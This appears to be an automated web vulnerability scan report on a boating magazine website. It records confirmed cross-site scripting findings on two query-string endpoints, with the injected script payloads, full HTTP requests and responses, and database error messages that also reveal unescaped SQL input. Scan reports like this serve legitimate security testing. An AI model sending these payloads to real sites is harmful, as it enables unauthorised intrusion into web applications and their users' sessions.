<script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_sea_savvy m_sea_savvy"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 52, c_sea_savvy<br />Menu: 79, m_sea_savvy-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscri..
- /boat-shop/on-sailboats

/boat-shop/on-sailboats CONFIRMED

http://www.soundingsonline.com/boat-shop/on-sailboats?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002005)</script>

Request

GET /boat-shop/on-sailboats?'"--></style></script><script>netsparker(0x002005)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002005)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002005)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/on-sailboats" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>On Sailboats with Dieter Loibner</title> <link href="/boat-shop/on-sailboats?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/on-sailboats?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_on_sailboats m_on_sailboats"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 50, c_on_sailboats<br />Menu: 95, m_on_sailboats-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span&..
- /boat-shop/used-boat-review

/boat-shop/used-boat-review CONFIRMED

http://www.soundingsonline.com/boat-shop/used-boat-review?'%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002008)</script>

Request

GET /boat-shop/used-boat-review?'"--></style></script><script>netsparker(0x002008)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002008)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002008)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/used-boat-review" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Used Boat Reviews from Readers, Stories and Boat Specifications</title> <link href="/boat-shop/used-boat-review?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/used-boat-review?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
